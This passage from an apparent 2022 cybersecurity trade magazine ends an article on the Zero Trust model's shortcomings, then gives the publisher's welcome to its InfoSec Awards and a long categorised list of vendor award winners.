legacy systems. However, the network, its subjects, and assets are still monitored, and policies are

refined to improve the model's efficiency.

Shortcomings of the Zero Trust security model

Eliminating cybersecurity risk entirely is a far-fetched expectation. Although enterprises can reduce the

overall risk of cyberattacks by properly implementing and continuously monitoring the Zero Trust security

model, the architecture is prone to challenges, and organizations need to learn to overcome them. While

customizing the Zero Trust architecture in a piecemeal approach, legacy solutions can create policy gaps

that bad actors use as loopholes to control the network.

Cybersecurity professionals must be extensively trained to configure and monitor the policy engine and

policy administrator properly because these components are responsible for making access-related

decisions. Any changes in these components' configuration must be logged and audited to ensure that

the decision-making process is flawless. Enterprise resources cannot interact with each other without the

policy administrator's approval. DoS attacks often block the communication path or traffic to policy

enforcement points from many users to disrupt the enterprise operations.

Enterprises that have security analytics to monitor and analyze the network traffic store the metadata for

forensics and build contextual policies. This data becomes a target for attackers as gaining insights into

the enterprise architecture can be a great advantage for further attacks. Zero Trust architecture is heavily

dependent on artificial intelligence and other software-based agents to improve the enterprise's security

posture. However, authenticating these components is an underlying issue. An attacker could gain

access to a software agent's credentials and launch a botnet attack to infect other systems.

232

In the current scenario, Zero Trust is the most comprehensive approach to complement the perimeter-

based security architecture. The key principle of Zero Trust is based on the concept that no user, device

or application/services will be trusted by default, irrespective of its location. This technology is expected

to have widespread adoption in the current year as it accommodates the security principles required to

combat the increasing number of sophisticated attacks. All network-related entities must be contextually

authenticated on a continual basis to ensure that all diversions in their behavioral patterns are spotted

before a breach happens. Zero Trust fulfills the demands of a unified remote working experience through

hyper-converged technology and infrastructure. Looking past a pandemic-forced remote work towards a

hybrid workplace, the "built-in security" Zero Trust is a must-have project in 2022.

About the Author

Debanjali Ghosh, a technical evangelist at ManageEngine,

helps IT leaders and global enterprises to take on the

evolving cybersecurity challenges. She is a sought speaker

on the key IAM and cybersecurity trends in international

platforms. Her research studies on the topics of Zero Trust,

advanced authentication, and building an enterprise-grade

cybersecurity framework have received much acclaim

internationally. Her insight and advice on leveraging the

latest technology for better IAM and cybersecurity have

helped many Fortune 500 companies.

Debanjali can be reached online at

(debanjali@manageengine.com,etc..) and at our company

website (www.manageengine.com)

233

Welcome to the Cyber Defense

Global InfoSec Awards for

2022

As we go to press on this annual RSAC issue of Cyber Defense Magazine, on

behalf of Cyber Defense Media Group, we celebrate our strong relationship with

the RSA organization. Among the many valuable services and affiliations, we

enjoy, the RSA connection is one of our most important.

It is with great pleasure that we dedicate this RSA/June 2022 issue of Cyber

Defense Magazine to our support and participation in the RSA Conference set

for June 6-9, 2022, in San Francisco.

We have worked diligently at our end to produce one of the largest and most

comprehensive issues of Cyber Defense Magazine in our 10-year history. With

nearly 50 articles from cyber security professionals, many of them planning to

attend RSAC 2022, we continue to grow in distribution and actionable

intelligence for our contributors and readers. We continue to monitor closely

and respond to the needs of our audience.

Accordingly, the scope of CDMG’s activities has grown into many media

endeavors to meet these growing needs. We offer Cyber Defense Awards;

Cyber Defense Conferences; Cyber Defense Professionals (job postings);

Cyber Defense TV, Radio, and Webinars; and Cyber Defense Ventures

(partnering with investors). The full list, with links, can be accessed at:

https://www.cyberdefensemagazine.com/cyber-defense-media-group-10-year-

anniversary-daily-celebration-in-2022/

Cybersecurity is on the front line of the ongoing protection of our economy and

critical infrastructure. It’s no surprise that there are now hundreds of thousands

of career openings and unlimited opportunities for those who wish to make a

positive impact on today's digital world. Cyber Defense Media Group is

dedicated to providing the information and tools for professionals to create

resilient and sustainable cyber systems.

Congratulations to all our winners!

Gary S. Miliefsky, CEO

Cyber Defense Media Group

Publisher, Cyber Defense Magazine

234

Access Control

Axis Security Best Product Access Control

Account Takeover Protection

D4t4 Solutions Most Comprehensive Account Takeover Protection

XTN Cognitive Security Editor's Choice Account Takeover Protection

Active Directory Security Solution

CionSystems Most Comprehensive Active Directory Security Solution

Advanced Persistent Threat (APT) Detection and

Response

Datto Hot Company Advanced Persistent Threat (APT) Detection and Response

SECUINFRA GmbH Cutting Edge Advanced Persistent Threat (APT) Detection and

Response

IronNet Editor's Choice Advanced Persistent Threat (APT) Detection and Response

Adversarial ML Threat Mitigation

Adversa AI Next Gen Adversarial ML Threat Mitigation

Bosch AIShield Market Leader Adversarial ML Threat Mitigation

Anti-Malware

Microsoft Hot Company Anti-Malware

Cythereal Most Innovative Anti-Malware

235

Anti-Phishing

Donuts Inc. Publisher's Choice Anti-phishing

Egress Most Comprehensive Anti-phishing

INKY Technology Best Product Anti-phishing

Inspired eLearning Most Innovative Anti-phishing

Pixm Cutting Edge Anti-phishing

Security Mentor, Inc. Editor's Choice Anti-phishing

SlashNext Next Gen Anti-phishing

Thrive Hot Company Anti-phishing

Valimail Market Leader Anti-phishing

Anti-Virus

Microsoft Publisher's Choice Anti-Virus

API Security

Noname Security Most Innovative API Security

Salt Security Next Gen API Security

Application Security

Data Theorem Cutting Edge Application Security

Cycode Most Comprehensive Application Security

Enso Security Publisher's Choice Application Security

HUMAN Security, Inc. Market Leader Application Security

Imperva Most Innovative Application Security

Reflectiz Editor's Choice Application Security

ReversingLabs Best Product Application Security

Security Compass Hot Company Application Security

VMware Best Solution Application Security

236

Application Vulnerability Detection

K2 Cyber Security Hot Company Application Vulnerability Detection

Artificial Intelligence and Machine Learning

Deloitte Publisher's Choice Artificial Intelligence and Machine Learning

Bosch AIShield Market Leader Artificial Intelligence and Machine Learning

Silobreaker Most Innovative Artificial Intelligence and Machine Learning

Bank of America Editor's Choice Artificial Intelligence and Machine Learning

LogicHub Most Comprehensive Artificial Intelligence and Machine Learning

Attack Surface Management

Bishop Fox Hot Company Attack Surface Management

Cyble Most Comprehensive Attack Surface Management

CyCognito Publisher's Choice Attack Surface Management

Data Theorem Market Leader Attack Surface Management

Deloitte Most Innovative Attack Surface Management

Noetic Cyber Cutting Edge Attack Surface Management

Praetorian Editor's Choice Attack Surface Management

Red Piranha Limited Next Gen Attack Surface Management

Lucidum Hot Company Attack Surface Management

Authentication

Bank of America Market Leader Authentication

237

Authorization for Cloud Security

Authomize Cutting Edge Authorization for Cloud Security

Breach & Attack Simulation

Cymulate Most Comprehensive Breach & Attack Simulation

Praetorian Publisher's Choice Breach & Attack Simulation

StrikeReady Market Leader Breach & Attack Simulation

Keysight Technologies Most Innovative Breach & Attack Simulation

Picus Security Cutting Edge Breach & Attack Simulation

Radiflow Editor's Choice Breach & Attack Simulation

Browser Isolation

Ericom Software Next Gen Browser Isolation

Minerva Labs Most Comprehensive Browser Isolation

Perception Point Market Leader Browser Isolation

Central Log Management

Fluency Security Market Leader Central Log Management

Graylog, Inc. Most Innovative Central Log Management

CIEM: IDEntitleX

Attivo Networks Cutting Edge CIEM: IDEntitleX

238

Cloud Access Security Broker (CASB)

Grip Security Editor's Choice Cloud Access Security Broker (CASB)

Lookout Next Gen Cloud Access Security Broker (CASB)

Cloud Backup

Konica Minolta Business Solutions U.S.A., Inc. Most Innovative Cloud Backup

Cloud Infrastructure Entitlement Management (CIEM)

Ermetic Ltd Hot Company Cloud Infrastructure Entitlement Management (CIEM)

Cloud MDR Provider

Trustwave Best Solution Cloud MDR Provider

Cloud Native Security

BigID Hot Company Cloud Native Security

Xmirror Security Publisher's Choice Cloud Native Security

Cloud Obfuscation

Conceal Next Gen Cloud Obfuscation

Dispersive Holdings, Inc. Editor's Choice Cloud Obfuscation

239

Cloud Security

Anitian Most Comprehensive Cloud Security

Confluera Inc. Publisher's Choice Cloud Security

Deloitte Market Leader Cloud Security

Iboss Most Innovative Cloud Security

Imperva Cutting Edge Cloud Security

Skyhigh Security Editor's Choice Cloud Security

Netskope Next Gen Cloud Security

Noname Security Hot Company Cloud Security

ThreatModeler Software Inc. Best Product Cloud Security

Valtix, Inc Most Comprehensive Cloud Security

Microsoft Market Leader Cloud Security

Data Theorem Most Innovative Cloud Security

Fastly Next Gen Cloud Security

Ntirety Next Gen Cloud Security

Cloud Security and Monitoring

ManageEngine, a division of Zoho Corporation Cutting Edge Cloud Security and

Monitoring

Cloud Security Automation

Anitian Publisher's Choice Cloud Security Automation

CoreStack Market Leader Cloud Security Automation

Wing Security Most Innovative Cloud Security Automation

240

Cloud Security Monitoring

Sumo Logic Best Solution Cloud Security Monitoring

Cloud Security Posture Management (CSPM)

Anitian Most Comprehensive Cloud Security Posture Management (CSPM)

Ermetic Ltd Publisher's Choice Cloud Security Posture Management (CSPM)

Suridata Market Leader Cloud Security Posture Management (CSPM)

Cloud Workload Protection

Colortokens Most Innovative Cloud Workload Protection

Confluera Cutting Edge Cloud Workload Protection

Intelligent Waves LLC Editor's Choice Cloud Workload Protection

Cloud-based Operational Technology (OT) & Internet of

Things (IoT) Cybersecurity

Nozomi Networks Next Gen Cloud-based Operational Technology (OT) & Internet of

Things (IoT) Cybersecurity

Company of the Year

KnowBe4 Publisher's Choice Company of the Year

241

Compliance

A-LIGN Best Product Compliance

Anitian Most Comprehensive Compliance

Atlantic.Net Publisher's Choice Compliance

Hyperproof Market Leader Compliance

PCI Pal Most Innovative Compliance

Reciprocity Cutting Edge Compliance

CyberSaint Security Next Gen Compliance

Compliance Automation

Allgress, Inc. Editor's Choice Compliance Automation

Anitian Next Gen Compliance Automation

CoreStack Hot Company Compliance Automation

Secureframe Best Product Compliance Automation

Onward Security Most Innovative Compliance Automation

Computer Forensics

Exterro, Inc Most Comprehensive Computer Forensics

Confidential Computing

Fortanix Publisher's Choice Confidential Computing

242

Container Security

Confluera Market Leader Container Security

Skyhigh Security Most Innovative Container Security

NeuVector Cutting Edge Container Security

Content Disarm and Reconstruction (CDR)

Votiro Publisher's Choice Content Disarm and Reconstruction (CDR)

Forcepoint Editor's Choice Content Disarm and Reconstruction (CDR)

Resec Next Gen Content Disarm and Reconstruction (CDR)

Continuous Compromise Assessment

Lumu Technologies Hot Company Continuous Compromise Assessment

Continuous Controls Monitoring Platform

Noetic Cyber Best Product Continuous Controls Monitoring Platform

CyberSaint Security Next Gen Continuous Controls Monitoring Platform

Critical Infrastructure Protection

BedRock Systems Inc. Critical Infrastructure Protection

OPSWAT, Inc Publisher's Choice Critical Infrastructure Protection

Shift5 Market Leader Critical Infrastructure Protection

TXOne Networks Most Innovative Critical Infrastructure Protection

243

Cyber Discovery

Ground Labs Next Gen Cyber Discovery

Cyber Insurance

Corvus Insurance Hot Company Cyber Insurance

Cowbell Cyber Best Product Cyber Insurance

Cyber Security as a Service

Deloitte Market Leader Cyber Security as a Service

Cyber Security Awareness

SBER Hot Company Cyber Security Awareness

Terranova Security Market Leader Cyber Security Awareness

244

Cyber Security Book

Mandiant Market Leader Cyber Security Book

SecurityMetrics Most Innovative Cybersecurity Book

Cyber Security Training

Deloitte Editor's Choice Cyber Security Training

Cybersecurity - Healthcare Practices

Alexio Corporation Cutting Edge Cybersecurity - Healthcare Practices

Cybersecurity Analytics

Cyble Next Gen Cybersecurity Analytics

StrikeReady Most Innovative Cybersecurity Analytics

CyberSaint Security Next Gen Cybersecurity Analytics

245

Cybersecurity Artificial Intelligence

Axiado Corporation Most Comprehensive Cybersecurity Artificial Intelligence

Bosch AIShield Publisher's Choice Cybersecurity Artificial Intelligence

CUJO AI Market Leader Cybersecurity Artificial Intelligence

Cyble Most Innovative Cybersecurity Artificial Intelligence

Darktrace Holdings, LTD Cutting Edge Cybersecurity Artificial Intelligence

Flexxon Pte Ltd Editor's Choice Cybersecurity Artificial Intelligence

Pixm Next Gen Cybersecurity Artificial Intelligence

ReaQta Hot Company Cybersecurity Artificial Intelligence

SlashNext Best Product Cybersecurity Artificial Intelligence

StrikeReady Most Comprehensive Cybersecurity Artificial Intelligence

Vectra AI Publisher's Choice Cybersecurity Artificial Intelligence

Cybersecurity Company of the Year

Bugcrowd Cutting Edge Cybersecurity Company of the Year

Sophos Editor's Choice Cybersecurity Company of the Year

246

Cybersecurity Content

ConnectWise Next Gen Cybersecurity Content

Inspired eLearning Hot Company Cybersecurity Content

Cybersecurity Education - For Small Businesses (SMBs)

ConnectWise Best Solution Cybersecurity Education - For Small Businesses (SMBs)

Cybersecurity Education for SMBs

Inspired eLearning Publisher's Choice Cybersecurity Education for SMBs

Cybersecurity Education – for Enterprises

Tata Consultancy Services Limited Most Innovative Cybersecurity Education – for

Enterprises

Bank of America Publisher's Choice Cybersecurity Education – for Enterprises

Cybersecurity Internet of Things (IoT)

Palo Alto Networks Best Product Cybersecurity Internet of Things (IoT)

Cybellum Cutting Edge Cybersecurity Internet of Things (IoT)

Cybersecurity Product Engineering Services

Sacumen Hot Company Cybersecurity Product Engineering Services

247

Cybersecurity Research

Anomali Most Comprehensive Cybersecurity Research

Forescout Publisher's Choice Cybersecurity Research

NTT Application Security Market Leader Cybersecurity Research

Microsoft Most Innovative Cybersecurity Research

WatchGuard Technologies Cutting Edge Cybersecurity Research

Cybersecurity Service Provider Auditor of the Year

CSIOS Corporation Editor's Choice Cybersecurity Service Provider Auditor of the

Year

Cybersecurity Service Provider of the Year

CSIOS Corporation Next Gen Cybersecurity Service Provider of the Year

NuData Security, a Mastercard company Market Leader Cybersecurity Service

Provider of the Year

Ntirety Editor's Choice Cybersecurity Service Provider of the Year

Redpoint Most Innovative Cybersecurity Service Provider of the Year

248

Cybersecurity Services

TPx Most Comprehensive Cybersecurity Services

Havoc Shield Most Innovative Cybersecurity Services

Ntirety Editor's Choice Cybersecurity Services

CyZen Publisher's Choice Cybersecurity Services

Cybersecurity Startup of the Year

Cycode Cutting Edge Cybersecurity Startup of the Year

Feroot Security Editor's Choice Cybersecurity Startup of the Year

Grip Security Next Gen Cybersecurity Startup of the Year

Infinipoint Hot Company Cybersecurity Startup of the Year

JupiterOne Most Comprehensive Cybersecurity Startup of the Year

KeyAvi Publisher's Choice Cybersecurity Startup of the Year

Noetic Cyber Market Leader Cybersecurity Startup of the Year

SharkStriker Inc. Most Innovative Cybersecurity Startup of the Year

StrikeReady Cutting Edge Cybersecurity Startup of the Year

Talon Cyber Security Editor's Choice Cybersecurity Startup of the Year

Titaniam Inc. Next Gen Cybersecurity Startup of the Year

Torq Hot Company Cybersecurity Startup of the Year

Cydome Security Most Innovative Cybersecurity Start-up of the Year

Flow Security Ltd. Hot Company Cybersecurity Startup of the Year

249

Cybersecurity Training

Cybervista Best Product Cybersecurity Training

Infosec Institute Most Comprehensive Cybersecurity Training

Inspired eLearning Publisher's Choice Cybersecurity Training

ITProTV, an ACI Learning Company Market Leader Cybersecurity Training

PECB Most Innovative Cybersecurity Training

RangeForce Cutting Edge Cybersecurity Training

Cybersecurity Training Videos

ConnectWise Editor's Choice Cybersecurity Training Videos

Inspired eLearning Next Gen Cybersecurity Training Videos

Cybersecurity Visionary

Quantum Xchange Hot Company Cybersecurity Visionary

Cybersecurity-as-a-Service (CaaS)

Beijing ThreatBook Technology Co., Ltd. Best Solution Cybersecurity-as-a-Service

(CaaS)

Coro Cutting Edge Cybersecurity-as-a-Service (CaaS)

NordLayer Next Gen Cybersecurity-as-a-Service (CaaS)

250

Data Export Security / Data Security

Cryptoloc Most Comprehensive Data Export Security / Data Security

Data Governance

Egnyte Publisher's Choice Data Governance

Satori Cyber Market Leader Data Governance

Data Loss Prevention

DTEX Systems Most Innovative Data Loss Prevention

GTB Technologies, Inc. Cutting Edge Data Loss Prevention

Laminar Editor's Choice Data Loss Prevention

CoSoSys Next Gen Data Loss Prevention (DLP)

251

Data Security

1touch.io Hot Company Data Security

Cloudrise, Inc. Best Solution Data Security

Dasera Most Comprehensive Data Security

Egnyte Publisher's Choice Data Security

Flexxon Pte Ltd Cutting-Edge Data Security

GTB Technologies, Inc. Most Innovative Data Security

Imperva Market Leader Data Security

Keeper Security Editor's Choice Data Security

Netskope Next Gen Data Security

Rubrik Hot Company Data Security

ShardSecure Publisher's Choice Data Security

Sotero Editor's Choice Data Security

Secure Data Recovery Services Market Leader Data Security

HelpSystems Unique Solution Data Security

Database Security

Don't Be Breached Most Innovative Database Security

Deception Based Security

Illusive Most Innovative Deception Based Security

Deception-Based Technology

Attivo Networks Market Leader Deception-Based Technology

252

Deep Sea Phishing

Red Sift Next Gen Deep Sea Phishing

Ericom Software Most Innovative Deep Sea Phishing

Perception Point Hot Company Deep Sea Phishing

Defensive Cyberspace Operations Team of the Year

CSIOS Corporation Publisher's Choice Defensive Cyberspace Operations Team of the

Year

DevSecOps

Bishop Fox Most Comprehensive DevSecOps

Contrast Security Publisher's Choice DevSecOps

Cycode Market Leader DevSecOps

Rezilion, Inc. Most Innovative DevSecOps

Security Compass Cutting Edge DevSecOps

Stacklet Editor's Choice DevSecOps

Xmirror Security Hot Company DevSecOps

Digital Executive Protection

BlackCloak Next Gen Digital Executive Protection

Cyble Hot Company Digital Executive Protection

Nisos Best Solution Digital Executive Protection

253

Digital Footprint Security

IDX Market Leader Digital Footprint Security

Email Security

Perception Point Hot Company Email Security

Email Security and Management

Hornetsecurity Publisher's Choice Email Security and Management

Mimecast Market Leader Email Security and Management

Vipre Security Group Most Innovative Email Security and Management

Microsoft Editor's Choice Email Security and Management

Zix Cutting Edge Email Security and Management

Embedded Security

Lattice Semiconductor Next Gen Embedded Security

Encryption

SafeLogic Hot Company Encryption

Titaniam Inc. Best Product Encryption

254

Endpoint Security

Absolute Software Most Comprehensive Endpoint Security

ArmorPoint Publisher's Choice Endpoint Security

AT&T Cybersecurity Market Leader Endpoint Security

Bufferzone Security Most Innovative Endpoint Security

DriveLock SE Cutting Edge Endpoint Security

Flexxon Pte Ltd Editor's Choice Endpoint Security

WithSecure Next Gen Endpoint Security

Konica Minolta Business Solutions U.S.A., Inc. Hot Company Endpoint Security

RevBits LLC Best Product Endpoint Security

Syxsense Most Comprehensive Endpoint Security

Talon Cyber Security Publisher's Choice Endpoint Security

ThreatLocker Market Leader Endpoint Security

WatchGuard Technologies Editor's Choice Endpoint Security

Endpoint Security Agent

Microsoft Most Innovative Endpoint Security Agent

Endpoint Security Management

Microsoft Most Cutting Edge Endpoint Security Management

255

Enterprise Digital Rights Management (EDRM)

SealPath Technologies S.L. Next Gen Enterprise Digital Rights Management (EDRM)

Enterprise Security

Anitian Hot Company Enterprise Security

Darktrace Holdings, LTD Market Leader Enterprise Security

PKWARE Best Product Enterprise Security

Red Sift Best Solution Enterprise Security

Sectigo Limited Cutting Edge Enterprise Security

ERP Security

Onapsis Market Leader ERP Security

256

Extended Detection and Response (XDR)

Deloitte Most Comprehensive Extended Detection and Response (XDR)

Anomali Publisher's Choice Extended Detection and Response (XDR)

Beijing ThreatBook Technology Co., Ltd. Market Leader Extended Detection and

Response (XDR)

Hillstone Networks Most Innovative Extended Detection and Response (XDR)

Hunters Cutting Edge Extended Detection and Response (XDR)

Netsurion Editor's Choice Extended Detection and Response (XDR)

Red Piranha Limited Next Gen Extended Detection and Response (XDR)

RevBits LLC Hot Company Extended Detection and Response (XDR)

Seceon Best Product Extended Detection and Response (XDR)

Secureworks Editor's Choice Extended Detection and Response (XDR)

ThreatQuotient Publisher's Choice Extended Detection and Response (XDR)

AT&T Cybersecurity Most Comprehensive Extended Detection and Response (XDR)

Cynet Publisher's Choice Extended Detection and Response (XDR)

Milton Security, Inc. Market Leader Extended Detection and Response (XDR)

Optiv Security Most Innovative Extended Detection and Response (XDR)

ReliaQuest Cutting Edge Extended Detection and Response (XDR)

Stellar Cyber, Inc. Editor's Choice Extended Detection and Response (XDR)

Trellix Next Gen Extended Detection and Response (XDR)

Fidelis Cybersecurity Hot Company Extended Detection and Response (XDR)

Confluera Best Product Extended Detection and Response (XDR)

257

Firmware

Eclypsium Best Solution Firmware

Fraud Prevention

Deduce Hot Company Fraud Prevention

FiVerity Cutting Edge Fraud Prevention

Veriff Next Gen Fraud Prevention

IDX Editor's Choice Fraud Prevention

Global MDR Service Provider

Trustwave Best Solution Global MDR Service Provider

Go-To-Market Agency for Cyber Security Startups

ConnectWise Most Comprehensive Go-To-Market Agency for Cyber Security Startups

Governance, Risk and Compliance (GRC)

Stacklet Publisher's Choice Governance, Risk and Compliance (GRC)

Difenda Market Leader Governance, Risk and Compliance (GRC)

SCADAfence Most Innovative Governance, Risk and Compliance (GRC)

Hyperproof Cutting Edge Governance, Risk and Compliance (GRC)

OneTrust Editor's Choice Governance, Risk and Compliance (GRC)

258

Hardware Access Control

Sepio Systems Inc. Next Gen Hardware Access Control

Healthcare IoT Security

Armis Hot Company Healthcare IoT Security

Asimily Best Solution Healthcare IoT Security

Cybellum Most Comprehensive Healthcare IoT Security

CyberMDX Publisher's Choice Healthcare IoT Security

Cynerio Market Leader Healthcare IoT Security

Palo Alto Networks Most Innovative Healthcare IoT Security

Palo Alto Cutting Edge Healthcare IoT Security

Palo Alto Editor's Choice Healthcare IoT Security

Cybersecurity Product Engineering Services

Sacumen Editor's Choice Cybersecurity Product Engineering Services

ICS/SCADA Security

Armis Cutting Edge ICS/SCADA Security

Radiflow Editor's Choice ICS/SCADA Security

SCADAfence Next Gen ICS/SCADA Security

TXOne Networks Hot Company ICS/SCADA Security

259

ID Verification

1Kosmos Best Product ID Verification

Identity & Access Management

Imprivata Most Comprehensive Identity & Access Management

Infinipoint Publisher's Choice Identity & Access Management

ManageEngine, a division of Zoho Corporation Cutting Edge Identity & Access

Management

Omada Editor's Choice Identity & Access Management

OneLogin Cutting Edge Identity & Access Management

Optimal IdM Editor's Choice Identity & Access Management

Ping Identity Next Gen Identity & Access Management

Britive Hot Company Identity & Access Management

PlainID Best Solution Identity & Access Management

Radiant Logic Most Innovative Identity & Access Management

Keyfactor Publisher's Choice Identity & Access Management

Microsoft Market Leader Identity & Access Management

Transmit Security Hot Company Identity & Access Management

SecureAuth Hot Company Identity & Access Management

260

Identity Data

Radiant Logic Hot Company Identity Data

Incident Management

D4t4 Solutions Most Comprehensive Identity Management

Keyfactor Publisher's Choice Identity Management

Identity Orchestration

Strata Identity Market Leader Identity Orchestration

Identity Protection

Silverfort Most Innovative Identity Protection

Identity Security

CyberArk Cutting Edge Identity Security

Attivo Networks Editor's Choice Identity Security

Imprivata Next Gen Identity Security

261

Identity Verification

Trulioo Hot Company Identity Verification

Persona Best Product Identity Verification

Incident Response

Deloitte Most Comprehensive Incident Response

Endace Publisher's Choice Incident Response

Intezer Market Leader Incident Response

Orange Cyberdefense Most Innovative Incident Response

StrikeReady Cutting Edge Incident Response

eSentire Editor's Choice Incident Response

IDX Hot Company Incident Response

Industrial Cybersecurity

Cybellum Next Gen Industrial Cybersecurity

Forescout Technologies, Inc. Hot Company Industrial Cybersecurity

TXOne Networks Best Product Industrial Cybersecurity

Zuul IoT Editor's Choice Industrial Cybersecurity

Information Technology Vendor Risk Management (ITVRM)

OneTrust Next Gen Information Technology Vendor Risk Management (ITVRM)

262

InfoSec Startup of the Year

BedRock Systems Inc. Editor's Choice InfoSec Startup of the Year

BreachQuest Publisher's Choice Infosec Startup of the Year

CYBERGROOT Limited Hot Company InfoSec Startup of the Year

Cyble Next Gen InfoSec Startup of the Year

Neosec Cutting Edge InfoSec Startup of the Year

Valence Security Publisher's Choice Infosec Startup of the Year

Insider Threat Detection

Code42 Market Leader Insider Threat Detection

ExtraHop Next Gen Insider Threat Detection

Gurucul Cutting Edge Insider Threat Detection

VMware Most Innovative Insider Threat Detection

Insider Threat Prevention

Advanced Onion, Inc. Hot Company Insider Threat Prevention

Deloitte Editor's Choice Insider Threat Prevention

DTEX Systems Publisher's Choice Insider Threat Prevention

263

Insider Threat Protection

Deloitte Best Solution Insider Threat Protection

Internet of Things (IoT) Security

Armis Most Comprehensive Internet of Things (IoT) Security

Forescout Technologies, Inc. Publisher's Choice Internet of Things (IoT) Security

Order Market Leader Internet of Things (IoT) Security

SCADAfence Most Innovative Internet of Things (IoT) Security

SecuriThings Cutting Edge Internet of Things (IoT) Security

SAM Seamless Network Editor’s Choice Internet of Things (IoT) Security

Intrusion Detection System (IDS)

INTRUSION Editor's Choice Intrusion Detection System (IDS)

Low-code/no-code Security

Torq Hot Company Low-code/no-code Security

Zenity.io Best Product Low-code/no-code Security

Valence Security Most Innovative Low-code/no-code Security

264

Machine Identity Management

Venafi Most Comprehensive Machine Identity Management

Malware Analysis

Intezer Publisher's Choice Malware Analysis

Managed Detection & Response (MDR)

Deepwatch Market Leader Managed Detection & Response (MDR)

Deloitte Most Innovative Managed Detection & Response (MDR)

Alert Logic Cutting Edge Managed Detection & Response (MDR)

eSentire Editor's Choice Managed Detection & Response (MDR)

Critical Insight Next Gen Managed Detection & Response (MDR)

Netsurion Hot Company Managed Detection & Response (MDR)

Orange Cyberdefense Best Product Managed Detection & Response (MDR)

GM Sectec Market Leader Managed Detection & Response (MDR)

Logichub Hot Company Managed Detection & Response (MDR)

Avertium LLC Most Comprehensive Managed Detection & Response (MDR)

CriticalStart Publisher's Choice Managed Detection & Response (MDR)

WithSecure Market Leader Managed Detection & Response (MDR)

Milton Security, Inc. Most Innovative Managed Detection & Response (MDR)

ReliaQuest Cutting Edge Managed Detection & Response (MDR)

265

Managed Detection and Response (MDR) Service Provider

ConnectWise Most Comprehensive Managed Detection and Response (MDR) Service

Provider

Difenda Most Innovative Managed Detection and Response (MDR) Service Provider

Open Systems Editor's Choice Managed Detection and Response (MDR) Service

Provider

SilverSky Publisher's Choice Managed Detection and Response (MDR) Service

Provider

Neustar Security Services Next Gen Managed Detection and Response (MDR)

Service Provider

Proficio Editor's Choice Managed Detection and Response (MDR) Service Provider

Critical Start Hot Company Managed Detection and Response (MDR) Service

Provider

Managed Endpoint Security

Nuspire Cutting Edge Managed Endpoint Security

266

Managed Security Service Provider (MSSP)

Simeio Most Comprehensive Managed Security Service Provider (MSSP)

Tata Communications Publisher's Choice Managed Security Service Provider (MSSP)

TrustNet Editor's Choice Managed Security Service Provider (MSSP)

Netsurion Most Innovative Managed Security Service Provider (MSSP)

Orange Cyberdefense Cutting Edge Managed Security Service Provider (MSSP)

Seceon Hot Company Managed Security Service Provider (MSSP)

Thrive Next Gen Managed Security Service Provider (MSSP)

GM Sectec Market Leader Managed Security Service Provider (MSSP)

Neustar Security Services Next Gen Managed Security Service Provider (MSSP)

ArmorPoint Best Solution Managed Security Service Provider (MSSP)

AT&T Cybersecurity Market Leader Managed Security Service Provider (MSSP)

Avertium Hot Company Managed Security Service Provider (MSSP)

Management and SaaS/Cloud Security

Gigamon Best Solution Management and SaaS/Cloud Security

Micro-Segmentation

Airgap Networks Best Product Micro-segmentation

ColorTokens Inc. Hot Company Micro-segmentation

267

Mobile Application Security

Verimatrix Most Comprehensive Mobile Application Security

Guardsquare Publisher's Choice Mobile Application Security

Mobile Device Security

Certo Software Ltd Market Leader Mobile Device Security

Hypori Most Innovative Mobile Device Security

Mobile Endpoint Security

SyncDog Cutting Edge Mobile Endpoint Security

MSSP of the Year

Masergy Communications, Inc. Editor's Choice MSSP of the Year

Multi-Factor Authentication

1Kosmos Most Comprehensive Multi-Factor Authentication

BIO-key International, Inc. Publisher's Choice Multi-Factor Authentication

WatchGuard Technologies Next Gen Multi-Factor Authentication

268

Network Detection and Response

NETSCOUT Market Leader Network Detection and Response

Network Security

Calix Market Leader Network Security

Gigamon Most Innovative Network Security

Network Security and Management

Tufin Cutting Edge Network Security and Management

Corelight Editor's Choice Network Security and Management

Endace Next Gen Network Security and Management

Versa Networks Best Solution Network Security and Management

ZERO Networks Market Leader Network Security and Management

WatchGuard Technologies Hot Company Network Security and Management

Neustar Security Services Next Gen Network Security and Management

AT&T Cybersecurity Market Leader Network Security Management

Network Security Services

Tata Communications Next Gen Network Security Services

269

Next Generation Firewall (NGFW)

Hillstone Networks Publisher's Choice Next Generation Firewall (NGFW)

Reblaze Editor's Choice Next Generation Firewall (NGFW)

PAM for Cloud Infrastructure

Keeper Security Next Gen PAM for Cloud Infrastructure

Packet Capture Platform

Endace Most Innovative Packet Capture Platform

Passwordless Authentication

1Kosmos Cutting Edge Passwordless Authentication

Secret Double Octopus Editor's Choice Passwordless Authentication

Microsoft Next Gen Passwordless Authentication

Keeper Security Market Leader Passwordless Authentication

270

Penetration Testing

Bishop Fox Most Comprehensive Penetration Testing

Digital Silence Publisher's Choice Penetration Testing

Horizon3.ai Market Leader Penetration Testing

NetSPI Most Innovative Penetration Testing

Ridge Security Technology Cutting Edge Penetration Testing

SecurityMetrics Editor's Choice Penetration Testing

Cobalt Next Gen Penetration Testing

Policy Management

AlgoSec Hot Company Policy Management

PR firm for Infosec Companies

Madison Alexander Most Innovative PR firm for Infosec Companies

Privacy and Security Compliance Automation

Coviant Software Best Solution Privacy and Security Compliance Automation

Privacy and Security Software (SMB)

Carbide Hot Company Privacy and Security Software (SMB)

271

Privileged Access Management (PAM)

Devolutions Editor's Choice Privileged Access Management (PAM)

Delinea Publisher's Choice Privileged Access Management (PAM)

Imprivata Market Leader Privileged Access Management (PAM)

RevBits LLC Most Innovative Privileged Access Management (PAM)

Delinea Cutting Edge Privileged Access Management (PAM) for Cloud Infrastructure

Privileged Account Security

Remediant Editor's Choice Privileged Account Security

Process Automation

HelpSystems Market Leader Process Automation

Railway Cybersecurity

Cervello Best Solution Railway Cybersecurity

Ransomless Ransomware Protection

Cryptoloc Next Gen Ransomless Ransomware Protection

Ericom Software Most Comprehensive Ransomless Ransomware Protection

Minerva Labs Publisher's Choice Ransomless Ransomware Protection

272

Ransomware Assessment

Digital Silence Market Leader Ransomware Assessment

Ransomware Data Security Solution

Titaniam Most Innovative Ransomware Data Security Solution

Ransomware Protection of SaaS Data

Gigamon Cutting Edge Ransomware Protection of SaaS Data

Spin Technology Inc. Next-gen Ransomware Protection of SaaS Data

Ransomware Security Solution

KeyAvi Next Gen Ransomware Security Solution

Remote Workforce Security

Airgap Networks Hot Company Remote Workforce Security

Response and Cloud Security

Fidelis Cybersecurity Best Solution Response and Cloud Security

273

Risk Management

Hyperproof Most Innovative Risk Management

LexisNexis Risk Solutions Publisher's Choice Risk Management

Reciprocity Hot Company Risk Management

